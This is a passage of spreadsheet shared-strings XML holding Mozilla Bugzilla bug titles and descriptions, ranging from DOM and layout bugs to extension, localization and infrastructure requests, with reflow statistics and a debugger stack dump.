entered text should be erased
I tested it with mozilla 1.0.1 1.2.1 1.3 1.4a 1.4b on linux. All show the
same behavior.
There are three examples
1. strict.html (uses HTML 4.01 Strict and id attribute)
2. transitional.html (uses HTML 4.01 Transitional and name attribute)
3. xhtml.xml (uses XHTML 1.0 Strict and id attribute)
All are very similar and use following construct:
...
Case 3 works but for case 1 and 2 the image overrides the reset()-function of
the formular which is then not longer accessbile from javascript.
So it's seems that the HTML DOM is broken here but the XHTML DOM works.</t>
  </si>
  <si>
    <t>joerg.baumann</t>
  </si>
  <si>
    <t>CORE-505835</t>
  </si>
  <si>
    <t>nsTreeBodyFrame::ReflowFinished() doesn't null check GetBaseElement()</t>
  </si>
  <si>
    <t>435 nsTreeBodyFrame::ReflowFinished()
454 nsIContent *treeContent = GetBaseElement()
455 if (treeContent-&gt;AttrValueIs(kNameSpaceID_None</t>
  </si>
  <si>
    <t>TOOLKIT-299302</t>
  </si>
  <si>
    <t>Skip certain items in getIncompatibleItemList</t>
  </si>
  <si>
    <t>getIncompatibleItemList on nsIExtensionManager should be able to provide a list
of incompatible items that EXCLUDES disabled items (since the user may not be
interested in using them anymore) and which excludes preconfigured items like
DOM Inspector Reporter etc. 
Attaching a patch that accomplishes this. Ultimately I would like distributions
to be able to supply a list of safe items that they ship with but this will do
for tbird/fx 1.1.</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-201893</t>
  </si>
  <si>
    <t>Too slow invocation of reflected methods for package-private classes</t>
  </si>
  <si>
    <t>Steven Beal wrote to me some time ago:
-------- Original Message --------
Subject: Rhino performance tip (FAQ recommendation)
Date: Fri 28 Feb 2003 10:20:34 -0800
From: Steven Beal 
To: Igor Bukanov (E-mail) 
Igor
I was experiencing poor performance on the IBM virtual
machine (the one shipped with Websphere) and eventually
traced the problem to excessive throwing and catching
of exceptions.  
The Sun VM  handles exceptions much more efficiently
and thus does not suffer quite so much from exceptions
being thrown and caught in quick succession which is
why I didn't notice the issue before.
This is not a bug in rhino in fact the condition is
produced by a workaround for a Sun java bug
http://developer.java.sun.com/developer/bugParade/bugs/4071593.html
See org.mozilla.javascript.NativeJavaMethod.retryIllegalAccessInvoke().
The pattern used here is the same as that shown in one of the
annotations of the currently open incarnation of the same bug
http://developer.java.sun.com/developer/bugParade/bugs/4071957.html
This bug is not limited to inner classes though.  It
will also manifest itself why trying to invoke via reflection
a method on a pkg. private class offered via an Interface.
I place several references into the local scope created for
a request that are interface references to pkg. private classes
created via an Abstract Factory pattern.  By making these
classes public I avoided the need for the bug workaround and
improved performance significantly (a necessary compromise).
Perhaps some mention of this should be made in the FAQ since the
performance impact is significant (extremely so on the IBM VM).
The same problem would be seen when using Dynamic Proxies 
and features of the Collection classes.  If you read through
the associated bug reports I'm sure you will find more cases.
Regards
-Steve</t>
  </si>
  <si>
    <t>CORE-479585</t>
  </si>
  <si>
    <t>Compile JS for Symbian</t>
  </si>
  <si>
    <t>christian.bugzilla</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-426196</t>
  </si>
  <si>
    <t>need new embedded player for air.mozilla.com</t>
  </si>
  <si>
    <t>Sorry of such late notice. I suck. 
We need the page at air.mozilla.com to be updated with the new player. 
The change is to replace 
with 
If this busts the layout please just comment out (or delete) the content to the right of the player the bit starting with Welcome to Air Mozilla the Internet multimedia presence of Mozilla....</t>
  </si>
  <si>
    <t>CORE-370940</t>
  </si>
  <si>
    <t>Crash [@ nsRefPtr::~nsRefPtr] [@ nsEventListenerManager::RemoveAllListeners]</t>
  </si>
  <si>
    <t>Created attachment 255715
testcase
Loading the testcase makes Firefox trunk crash.  I think this is a regression from the last few days.
Nightly: Crash [@ nsEventListenerManager::RemoveAllListeners]
Debug: Crash [@ nsRefPtr::~nsRefPtr]</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-468695</t>
  </si>
  <si>
    <t>Port clients list to 0.3</t>
  </si>
  <si>
    <t>The clients list from 0.2 kept a single file on the server with a list of all known clients.  Since the server API has changed that no longer works.  We'll need to port it to 0.3.</t>
  </si>
  <si>
    <t>TOOLKIT-395377</t>
  </si>
  <si>
    <t>query string update to the safebrowsing lookup algorithm</t>
  </si>
  <si>
    <t>Created attachment 280063
update for new safebrowsing lookup changes
Since the implementation of the new safebrowsing protocol there have been two changes to the spec:
a) The URI is supposed to be checked with all query parameters intact.
b) The URI-with-a-$ part has been removed.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-270395</t>
  </si>
  <si>
    <t>Update Extension: CuteMenus</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
I have updated the main CuteMenus package to work with Firefox 1.0 Final
it can be found at http://downloads.mozdev.org/cute/cutemenus04.xpi
Please update
https://update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;id=23&amp;vid=614
to be available and for 1.0
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>psychoticwolf</t>
  </si>
  <si>
    <t>flexer</t>
  </si>
  <si>
    <t>SEAMONKEY-144463</t>
  </si>
  <si>
    <t>OCSP Response Signer pref dropdown changes size.</t>
  </si>
  <si>
    <t>In the prefs dialog for Privacy &amp; Security | Validation the dropdown list for
Response Signer starts out too short but gets wider after you select something.
When you first look at the list all entries say Built In Object T... so you
can't tell them apart. See attachment 1 for a screenshot. When you select
something the dropdown gets wider. See attachment 2. 
It would be nice if the dropdown was wider to start with then didn't change its
size.</t>
  </si>
  <si>
    <t>CORE-459266</t>
  </si>
  <si>
    <t>TM: Allow CALLINFO macros to specify linkage</t>
  </si>
  <si>
    <t>builtins.tbl:83: warning: â€˜JSBool js_CloseIterator(JSContext* jsval)â€™:
    visibility attribute ignored because it
  jsiter.h:76: warning: conflicts with previous declaration here
The one in jsiter.h is declared JS_FRIEND_API the autogenerated one in builtins.tbl has no linkage qualifier it is implicitly extern.
Most of the builtins should actually be static.</t>
  </si>
  <si>
    <t>CORE-514581</t>
  </si>
  <si>
    <t>ES5 strict mode: function instances have no magic 'caller' or 'arguments' properties</t>
  </si>
  <si>
    <t>From ES5 Annex C:
An implementation may not associate special meanings within strict mode functions to properties named caller or arguments of function instances. ECMAScript code may not create or modify properties with these names on function objects that correspond to strict mode functions (13.2).</t>
  </si>
  <si>
    <t>CORE-252955</t>
  </si>
  <si>
    <t>List items returning strange states</t>
  </si>
  <si>
    <t>Steps:
Run MSAA SDK's accessible event watch
View-&gt; Char Encodings -&gt; Customize
Arrow through list
What happens:
Extra states reported
Expected:
A set of sane states</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-442292</t>
  </si>
  <si>
    <t>Page Layout</t>
  </si>
  <si>
    <t>Top section of Yahoo home page is missing in Camino</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.8.1.14) Gecko/20080512 Camino/1.6.1 (like Firefox/2.0.0.14)
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.8.1.14) Gecko/20080512 Camino/1.6.1 (like Firefox/2.0.0.14)
Beginning June 26 the top section of my Yahoo home page has been missing in Camino. In other browsers including Firefox it still appears.
Reproducible: Always
Steps to Reproduce:
1.Open Camino which opens with home page Yahoo
2.Top section missing
3.</t>
  </si>
  <si>
    <t>jefschw</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-474645</t>
  </si>
  <si>
    <t>Jeff Balogh needs VPN access</t>
  </si>
  <si>
    <t>We need to give Jeff MPT VPN access so he can get to khan etc.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-281237</t>
  </si>
  <si>
    <t>New feed subscription dialog</t>
  </si>
  <si>
    <t>The UI I designed for the 1.0 release doesn't work very well when you have a
large number of feeds and when you have a large number of feeds associated with
a particular foldder. I always meant to re-write it as a nsITreeView so we can
add extra levels of containment to the UI (i.e. showing the folders and the
feeds contained under each folder).
Tracking bug for these changes.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-315948</t>
  </si>
  <si>
    <t>Trademark Review for Dutch (nl) Firefox 1.5</t>
  </si>
  <si>
    <t>Could you rename the vandale plugin to vandale-nl? Vandalism isn't really
a dutch-only thing :-). Just to avoid naming conflicts.
Could you add a link to mozilla.com right before the link to mozilla-europe.org
in bookmarks.html too?
Thanks</t>
  </si>
  <si>
    <t>SEAMONKEY-299825</t>
  </si>
  <si>
    <t>Search plugins in App directory are updated into Profile directory (resulting in double Search Bar entries)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050705 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050705 Firefox/1.0+
If an Search Plugin in the app dir's Searchplugin directory is automatically
updated the Internet Search Service places the update into the Users Profile
directory creating an .src file with the same Name as the one in the
application Searchplugin Directory and thus resulting in an double entry in the
Search Bar.
This happened to me (and others) with the Google Search Plugin.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>stebs</t>
  </si>
  <si>
    <t>TOOLKIT-309814</t>
  </si>
  <si>
    <t>fireEvent should report exceptions using Components.reportError</t>
  </si>
  <si>
    <t xml:space="preserve">Various XBL bindings declare a function called _fireEvent or similar which
fires the specified DOM event and executes the code in on*** attribute of the
target element.
In certain bindings (colorpicker preferences) the function's body is wrapped in
a try..catch block to make sure that an error/exception in the on*** handler
doesn't cause the fireEvent's caller to halt.
The problem is in the catch clause the exception is dump()-ed to console but
not to the JS Console. Many XUL developers use the JS Console for
troubleshooting and it's confusing to them that some of  errors in their code
doesn't get reported to the JS Console. (The problem here is inconsistency -
's oncommand reports the error while 's onpaneload does not.)
The solution is to report the error using Components.reportError(e) instead of
(or in addition to) dump(e). This will report the errors to the JS Console
albeit with wrong location info.
--
To test it you can load the following XUL (chrome):
&lt;prefwindow id=test
xmlns=http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul &gt;
  &lt;prefpane id=paneGeneral label=General
onpaneload=alert(0)undefinedFunction1()alert(1)&gt;
</t>
  </si>
  <si>
    <t>CORE-313078</t>
  </si>
  <si>
    <t>Trying to access .style of  throws Component does not have requested interface (NS_NOINTERFACE)</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Load 
data:image/svg+xml
2. javascript:alert(document.getElementsByTagName(script)[0].style)
Result: Error: uncaught exception: [Exception... Component does not have
requested interface [nsIDOMSVGStylable.style]  nsresult: 0x80004002
(NS_NOINTERFACE)  location: JS frame ::
javascript:alert(document.getElementsByTagName(script)[0].style) ::
 :: line 1  data: no]
Expected: null or a normal style object.</t>
  </si>
  <si>
    <t>TOOLKIT-521906</t>
  </si>
  <si>
    <t>Breakpad should report if extension compatibility overrides are being used</t>
  </si>
  <si>
    <t>A suspicion on some crashes is that extensions (esp. with binary components) are crashing as a result of the user having overridden compatibility checking. (eg by setting extensions.checkCompatibility = false though I think Nightly Tester Tools might to it a different way).
It would be good to have the crash reporter report if this is happening (at least the pref maybe more) so that by looking at the report we can know if the user dug their own hole and how big of a problem this is. [The suggestion was raised of resetting this pref after a major update so data would help with that decision.]</t>
  </si>
  <si>
    <t>CORE-80352</t>
  </si>
  <si>
    <t>Changing Bidi options never triggers reflow</t>
  </si>
  <si>
    <t>Marc Attinasi wrote:
  I'm getting the same results as Curtis basically. Running the same source
  built with and without BiDi enabled I get the following reflow data
  Default Build with IBMBIDI defined:
  Document http://jrgm.mcom.com/perf/loadtime5/base/www.w3.org_DOML2Core loaded 
  successfully
  Disabling View Source StyleSheet
  /perf/loadtime5/base/www.w3.org_DOML2Core/
                                  Init    Incrm   Resze   Style   Dirty   Total
  ------------------------------------------------------------------------------
            nsTableColFrame       780     0       0       0       0       780
       nsTableColGroupFrame       87      0       174     0       0       261
        nsBoxToBlockAdaptor       1       28      0       0       0       29
           nsGfxScrollFrame       1       26      0       0       0       27
          nsTableOuterFrame       87      0       174     0       0       261
                nsTextFrame       6226    0       9064    0       0       15290
            nsTableRowFrame       110     0       220     0       0       330
              nsInlineFrame       2752    0       3997    0       0       6749
              ViewportFrame       1       26      0       0       0       27
                CanvasFrame       1       26      2       0       0       29
           nsTableCellFrame       330     0       435     0       0       765
                    BRFrame       79      0       66      0       0       145
              nsBulletFrame       33      1       36      0       0       70
               nsBlockFrame       1962    222     3597    0       0       5781
                 HRuleFrame       2       0       4       0       0       6
       nsTableRowGroupFrame       87      0       174     0       0       261
                 nsBoxFrame       1       26      0       0       0       27
               nsTableFrame       87      0       89      0       0       176
               Grand Totals       12627   355     18032   0       0       31014
  Build without IBMBIDI defined:
  Document http://jrgm.mcom.com/perf/loadtime5/base/www.w3.org_DOML2Core loaded 
  successfully
  Disabling View Source StyleSheet
  /perf/loadtime5/base/www.w3.org_DOML2Core/
                                  Init    Incrm   Resze   Style   Dirty   Total
  ------------------------------------------------------------------------------
            nsTableColFrame       549     0       0       0       0       549
       nsTableColGroupFrame       87      0       97      0       0       184
        nsBoxToBlockAdaptor       1       51      0       0       0       52
           nsGfxScrollFrame       1       49      0       0       0       50
          nsTableOuterFrame       87      0       21      0       0       108
                nsTextFrame       6190    0       3129    0       0       9319
            nsTableRowFrame       110     0       126     0       0       236
              nsInlineFrame       2746    0       1531    0       0       4277
              ViewportFrame       1       49      0       0       0       50
                CanvasFrame       1       49      2       0       0       52
           nsTableCellFrame       330     0       345     0       0       675
                    BRFrame       79      0       6       0       0       85
              nsBulletFrame       33      0       28      0       0       61
               nsBlockFrame       1962    394     1188    0       0       3544
                 HRuleFrame       2       0       2       0       0       4
       nsTableRowGroupFrame       87      0       97      0       0       184
                 nsBoxFrame       1       49      0       0       0       50
               nsTableFrame       87      0       12      0       0       99
               Grand Totals       12354   641     6584    0       0       19579
  I'd like to start narrowing down the IBMBIDI sections that are causing this 
  since I cannot see it from a code inspection. nsTextFrame and nsBlockFrame 
  are my initial candidates and I'll start disabling selectively the IBMBIDI 
  sections from those files an rerunning.
  - marc</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-427690</t>
  </si>
  <si>
    <t>bootstrap Sign step should use HTTP not look for local file</t>
  </si>
  <si>
    <t>Now that bug 415970 has landed the only thing that uses the FTP setup on the master is the Sign step (which looks for a logfile and exits when it finds it).
This could instead use HTTP to check for the existence of the file on the $stagingServer.</t>
  </si>
  <si>
    <t>CORE-467177</t>
  </si>
  <si>
    <t>Form element including not-closed-paragraph ignores  (using SGML)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 cs rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 cs rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
When a form element contains a paragraph which is not closed (ended with ) Firefox ignores  and inserts it in front of .
Reproducible: Always
Steps to Reproduce:
1. go on the URL above
2. see the source</t>
  </si>
  <si>
    <t>zbytovsky</t>
  </si>
  <si>
    <t>FIREFOX-320383</t>
  </si>
  <si>
    <t>Sidebars accessible name is not human consumable</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20051214 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20051214 Firefox/1.6a1
The history panel has a long accessible name that appears to expose the implementation guts of Firefox.  Instead of something such as History the panel name is 'chrome://browser/content/history/history-panel.xul'
Reproducible: Always
Steps to Reproduce:
1) Run the attached standlone test app tool in an xterm
2) Run Firefox
3) Tab to the history pane area on the left of the window
4) Observe the output in the xterm
Actual Results:  
You will see the following output:
focus: 0 0 
  name='chrome://browser/content/history/history-panel.xul' role='html container' state='ENABLED FOCUSABLE FOCUSED SENSITIVE SHOWING VISIBLE'
This is saying the accessible name of the history pane is
some internal URL of really no interest to the user.
Expected Results:  
It would be nice to give this a more human consumable name.</t>
  </si>
  <si>
    <t>CORE-232233</t>
  </si>
  <si>
    <t>SetFileXPref causes a crash if value arg is null</t>
  </si>
  <si>
    <t>when doing multiple profile migration SetFileXPref gets called with a null
value which causes a downstream crash. This shouldn't crash. Fix upcoming.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-524946</t>
  </si>
  <si>
    <t>Incompatible Dutch dictionary for the Seamonkey version 2.0</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9.1.4) Gecko/20091017 SeaMonkey/2.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9.1.4) Gecko/20091017 SeaMonkey/2.0
Next message appears when trying to instaal the Dutch dictionary
Woordenboek Nederlands 2.0.0 could not be installed because it is not compatible with SeaMonkey 2.
Reproducible: Always
Actual Results:  
oordenboek Nederlands 2.0.0 could not be installed because it is not compatible with SeaMonkey 2.
Expected Results:  
Installing the Dutch dictionary</t>
  </si>
  <si>
    <t>fryskefirefox</t>
  </si>
  <si>
    <t>CORE-380021</t>
  </si>
  <si>
    <t>implement IAccessibleValue</t>
  </si>
  <si>
    <t>Created attachment 264087
patch</t>
  </si>
  <si>
    <t>CORE-61481</t>
  </si>
  <si>
    <t>meta:decoder enhancement</t>
  </si>
  <si>
    <t>THUNDERBIRD-292893</t>
  </si>
  <si>
    <t>toolkit/themes/Makefile.in uses qute for all-but-phoenix</t>
  </si>
  <si>
    <t>The logic in toolkit/thems/Makefile.in is reversed. It uses winstripe for 
winstripe for phoenix and qute for everything else. The logic is to use
qute for thunderbird and winstripe for everything else.
This breaks help viewer in xulrunner at least.
Patch coming up.</t>
  </si>
  <si>
    <t>CORE-266532</t>
  </si>
  <si>
    <t>###!!! ASSERTION: unexpected progress values: 'progress &lt;= progressMax' file r:/mozilla/netwerk/protocol/http/src/nsHttpChannel.cpp line 3796</t>
  </si>
  <si>
    <t>###!!! ASSERTION: unexpected progress values: 'progress &lt;= progressMax' file
r:/mozilla/netwerk/protocol/http/src/nsHttpChannel.cpp line 3796
Break: at file r:/mozilla/netwerk/protocol/http/src/nsHttpChannel.cpp line 3796
 	xpcom_core.dll!nsDebug::Assertion(const char * aStr=0x012db8a8 const char *
aExpr=0x012db8c4 const char * aFile=0x012dae50 int aLine=0x00000ed4)  Line 109	C++
 	necko.dll!nsHttpChannel::OnDataAvailable(nsIRequest * request=0x031fb740
nsISupports * ctxt=0x00000000 nsIInputStream * input=0x034dc330 unsigned int
offset=0x00000000 unsigned int count=0x0000052d)  Line 3796 + 0x2d	C++
&gt;	necko.dll!nsInputStreamPump::OnStateTransfer()  Line 438	C++
 	necko.dll!nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream *
stream=0x034dc330)  Line 339	C++
 	xpcom_core.dll!nsInputStreamReadyEvent::EventHandler(PLEvent *
plevent=0x0326e194)  Line 119	C++
 	xpcom_core.dll!PL_HandleEvent(PLEvent * self=0x0326e194)  Line 693	C
 	xpcom_core.dll!PL_ProcessPendingEvents(PLEventQueue * self=0x01062af8)  Line 628	C
 	xpcom_core.dll!_md_EventReceiverProc(HWND__ * hwnd=0x00272420 unsigned int
uMsg=0x0000c14e unsigned int wParam=0x00000000 long lParam=0x01062af8)  Line
1434	C
 	user32.dll!77d43a50() 	
 	user32.dll!77d43b1f() 	
 	user32.dll!GetMessageW()  + 0x125	
 	user32.dll!DispatchMessageW()  + 0xb	
 	appshell.dll!nsAppShellService::Run()  Line 484	C++
 	mozilla.exe!main1(int argc=0x00000000 char * * argv=0x80000000 nsISupports *
nativeApp=0x031fb744)  Line 1336	C++
 	mozilla.exe!main(int argc=0x00000001 char * * argv=0x003f7c10)  Line 1827 +
0x16	C++
 	mozilla.exe!mainCRTStartup()  Line 400 + 0x11	C
 	kernel32.dll!TermsrvAppInstallMode()  + 0x269	
+	progressMax	{mValue=0x0000000000000437 }	nsTInt64
+	progress	{mValue=0x000000000000052d }	nsTInt64
-	this	0x031fb744 {mRefCnt={mValue=0x00000002 }
_mOwningThread={mThread=0x003f5c80 } mState=0x00000002 ...}	nsInputStreamPump *
const
|+	nsIInputStreamPump	{...}	nsIInputStreamPump
|+	nsIInputStreamCallback	{...}	nsIInputStreamCallback
|+	mRefCnt	{mValue=0x00000002 }	nsAutoRefCnt
|+	_mOwningThread	{mThread=0x003f5c80 }	nsAutoOwningThread
|	mState	0x00000002	unsigned int
|+	mLoadGroup	{mRawPtr=0x00000000 }	nsCOMPtr
|-	mListener	{mRawPtr=0x02d41930 {mRefCnt={mValue=0x00000002 }
_mOwningThread={mThread=0x003f5c80 } mOriginalURI={mRawPtr=0x03549558
{mRefCnt={...} _mOwningThread={...} mSpec={...} ...} } ...} }
nsCOMPtr
|\-	mRawPtr	0x02d41930 {mRefCnt={mValue=0x00000002 }
_mOwningThread={mThread=0x003f5c80 } mOriginalURI={mRawPtr=0x03549558
{mRefCnt={mValue=0x00000003 } _mOwningThread={mThread=0x003f5c80 } mSpec={...}
...} } ...}	nsIStreamListener *
| |-	[nsHttpChannel]	{mRefCnt={mValue=0x00000002 }
_mOwningThread={mThread=0x003f5c80 } mOriginalURI={mRawPtr=0x03549558
{mRefCnt={mValue=0x00000003 } _mOwningThread={mThread=0x003f5c80 } mSpec={...}
...} } ...}	nsHttpChannel
| ||+	nsIHttpChannel	{...}	nsIHttpChannel
| ||+	nsIHttpChannelInternal	{...}	nsIHttpChannelInternal
| ||+	nsIStreamListener	{...}	nsIStreamListener
| ||+	nsICachingChannel	{...}	nsICachingChannel
| ||+	nsIUploadChannel	{...}	nsIUploadChannel
| ||+	nsICacheListener	{...}	nsICacheListener
| ||+	nsIEncodedChannel	{...}	nsIEncodedChannel
| ||+	nsITransportEventSink	{...}	nsITransportEventSink
| ||+	nsIResumableChannel	{...}	nsIResumableChannel
| ||+	mRefCnt	{mValue=0x00000002 }	nsAutoRefCnt
| ||+	_mOwningThread	{mThread=0x003f5c80 }	nsAutoOwningThread
| ||+	mOriginalURI	{mRawPtr=0x03549558 {mRefCnt={mValue=0x00000003 }
_mOwningThread={mThread=0x003f5c80 } mSpec={...} ...} }	nsCOMPtr
| ||+	mURI	{mRawPtr=0x03261c88 {mRefCnt={mValue=0x00000001 }
_mOwningThread={mThread=0x003f5c80 } mSpec={...} ...} }	nsCOMPtr
| ||+	mDocumentURI	{mRawPtr=0x03e87cc0 {mRefCnt={mValue=0x0000000c }
_mOwningThread={mThread=0x003f5c80 } mSpec={...} ...} }	nsCOMPtr
| ||+	mListener	{mRawPtr=0x03f90a28 {mRefCnt={mValue=0x00000001 }
_mOwningThread={mThread=0x003f5c80 } mInputTee={mRawPtr=0x00000000 } ...} }
nsCOMPtr
| ||+	mListenerContext	{...}	nsCOMPtr
| ||+	mLoadGroup	{mRawPtr=0x00000000 }	nsCOMPtr
| ||+	mOwner	{...}	nsCOMPtr
| ||+	mCallbacks	{mRawPtr=0x043592c0 }	nsCOMPtr
| ||+	mProgressSink	{mRawPtr=0x029baf80 {mRefCnt={mValue=0x0000001b }
_mOwningThread={mThread=0x003f5c80 } mDocumentRequest={mRawPtr=0x02ca4ff0
{mRefCnt={...} _mOwningThread={...} mOriginalURI={...} ...} } ...} }
nsCOMPtr
| ||+	mHttpEventSink	{mRawPtr=0x029baf8c {mRefCnt={mValue=0x0000001b }
_mOwningThread={mThread=0x003f5c80 } mDocumentRequest={mRawPtr=0x02ca4ff0
{mRefCnt={...} _mOwningThread={...} mOriginalURI={...} ...} } ...} }
nsCOMPtr
| ||+	mUploadStream	{mRawPtr=0x00000000 }	nsCOMPtr
| ||+	mReferrer	{mRawPtr=0x031b9038 {mRefCnt={mValue=0x00000001 }
_mOwningThread={mThread=0x003f5c80 } mSpec={...} ...} }	nsCOMPtr
| ||+	mSecurityInfo	{...}	nsCOMPtr
| ||+	mEventQ	{mRawPtr=0x01062a38 {mRefCnt={mValue=0x0000001f }
_mOwningThread={mThread=0x003f5c80 } mEventQueue=0x01062af8 {name=0x00390c08
Thread event queue... queue={next=0x039effa0 prev=0x04387b38 }
monitor=0x01062b48 ...} ...} }	nsCOMPtr
| ||-	mRequestHead	{mHeaders={mHeaders={mAutoBuf=0x02d41994  } }
mMethod={_val=0x012da804 GET } mVersion=0x0b 'â‹' ...}	nsHttpRequestHead
| |||+	mHeaders	{mHeaders={mAutoBuf=0x02d41994  } }	nsHttpHeaderArray
| |||+	mMethod	{_val=0x012da804 GET }	nsHttpAtom
| |||	mVersion	0x0b 'â‹'	unsigned char
| ||\-	mRequestURI	{...}	nsCString
| || \-	nsCSubstring	{...}	nsCSubstring
| ||  \-	nsACString	{mVTable=0x00394a58 const nsObsoleteACStringThunk::`vftable'
mData=0x04119b98
/?0.6883918567393155&amp;s=130479&amp;im=103&amp;r=http%3A//webtools.mozilla.org/buster/test_url_27.html&amp;pg=http%3A//www.dp.ru/index.php&amp;c=Y&amp;j=N&amp;wh=1600x1200&amp;px=16&amp;js=1.3&amp;
mLength=0x0000009f ...}	nsACString
| ||   |	mVTable	0x00394a58 const nsObsoleteACStringThunk::`vftable'	const void *
| ||   |+	mData	0x04119b98
/?0.6883918567393155&amp;s=130479&amp;im=103&amp;r=http%3A//webtools.mozilla.org/buster/test_url_27.html&amp;pg=http%3A//www.dp.ru/index.php&amp;c=Y&amp;j=N&amp;wh=1600x1200&amp;px=16&amp;js=1.3&amp;
char *
| ||   |	mLength	0x0000009f	unsigned int
| ||   \	mFlags	0x00000005	unsigned int
| ||-	mResponseHead	0x03f907c0 {mHeaders={mHeaders={mAutoBuf=0x03f907c8  } }
mVersion=0x0b 'â‹' mStatus=0x00c8 ...}	nsHttpResponseHead *
| |||-	mHeaders	{mHeaders={mAutoBuf=0x03f907c8  } }	nsHttpHeaderArray
| |||\-	mHeaders	{mAutoBuf=0x03f907c8  }	nsAutoVoidArray
| ||| |-	nsVoidArray	{mImpl=0x039f02b0 {mBits=0x80000010 mCount=0x0000000d
mArray=0x039f02b8 } }	nsVoidArray
| ||| ||+	__vfptr	0x00387ca4 const nsAutoVoidArray::`vftable'	*
| ||| |\-	mImpl	0x039f02b0 {mBits=0x80000010 mCount=0x0000000d
mArray=0x039f02b8 }	nsVoidArray::Impl *
| ||| | |	mBits	0x80000010	unsigned int
| ||| | |	mCount	0x0000000d	int
| ||| | \+	mArray	0x039f02b8	void * [1]
| ||| \+	mAutoBuf	0x03f907c8 	char [40]
| |||	mVersion	0x0b 'â‹'	unsigned char
| |||	mStatus	0x00c8	unsigned short
| |||+	mStatusText	{...}	nsCString
| |||	mContentLength	0x0000000000000437	__int64
| |||-	mContentType	{...}	nsCString
| |||\-	nsCSubstring	{...}	nsCSubstring
| ||| \-	nsACString	{mVTable=0x00394a58 const nsObsoleteACStringThunk::`vftable'
mData=0x02960a48 image/gif mLength=0x00000009 ...}	nsACString
| |||  |	mVTable	0x00394a58 const nsObsoleteACStringThunk::`vftable'	const void *
| |||  |+	mData	0x02960a48 image/gif	char *
| |||  |	mLength	0x00000009	unsigned int
| |||  \	mFlags	0x00000005	unsigned int
| |||+	mContentCharset	{...}	nsCString
| |||	mCacheControlNoStore	0x00	unsigned char
| |||	mCacheControlNoCache	0x01 'â'	unsigned char
| ||\	mPragmaNoCache	0x01 'â'	unsigned char
| ||+	mTransactionPump	{mRawPtr=0x031fb740 {mRefCnt={mValue=0x00000002 }
_mOwningThread={mThread=0x003f5c80 } mState=0x00000002 ...} }
nsCOMPtr
| ||+	mTransaction	0x034cccb8 {mRefCnt={mValue=0x00000001 }
_mOwningThread={mThread=0x003f5c80 } mCallbacks={mRawPtr=0x043592c0 } ...}
nsHttpTransaction *
| ||+	mConnectionInfo	0x01912e48 {mRef=0x00000003 mHashKey={...} mHost={...}
...}	nsHttpConnectionInfo *
| ||+	mSpec	{...}	nsCString
| ||	mLoadFlags	0x00040000	unsigned int
| ||	mStatus	0x00000000	unsigned int
| ||+	mLogicalOffset	{mValue=0x0000000000000000 }	nsTInt64
| ||	mCaps	0x01 'â'	unsigned char
| ||+	mContentTypeHint	{...}	nsCString
| ||+	mContentCharsetHint	{...}	nsCString
| ||+	mCacheEntry	{mRawPtr=0x03aa8700 {mRefCnt={mValue=0x00000002 }
_mOwningThread={mThread=0x003f5c80 } mCacheEntry=0x02bb9f38 {mKey=0x04010ef0
mFetchCount=0x00000001 mLastFetched=0x41811ee5 ...} ...} }
nsCOMPtr
| ||+	mCachePump	{mRawPtr=0x00000000 }	nsCOMPtr
| ||+	mCachedResponseHead	0x00000000 {mHeaders={mHeaders={mAutoBuf=0x00000008
 } } mVersion=??? mStatus=??? ...}	nsHttpResponseHead *
| ||	mCacheAccess	0x00000002	int
| ||	mPostID	0x00000000	unsigned int
| ||	mRequestTime	0x41811ee5	unsigned int
| ||+	mAuthContinuationState	0x00000000	nsISupports *
| ||+	mAuthType	{...}	nsCString
| ||+	mIdent	{mUser=0x00000000  mPass=0x00000000 
mDomain=0x00000000  }	nsHttpAuthIdentity
| ||+	mProxyIdent	{mUser=0x00000000  mPass=0x00000000 
mDomain=0x00000000  }	nsHttpAuthIdentity
| ||+	mEntityID	{...}	nsCString
| ||	mStartPos	0xffffffffffffffff	unsigned __int64
| ||	mRedirectionLimit	0x13 'â“'	unsigned char
| ||	mIsPending	0x00000001	unsigned int
| ||	mApplyConversion	0x00000001	unsigned int
| ||	mAllowPipelining	0x00000001	unsigned int
| ||	mCachedContentIsValid	0x00000000	unsigned int
| ||	mCachedContentIsPartial	0x00000000	unsigned int
| ||	mResponseHeadersModified	0x00000000	unsigned int
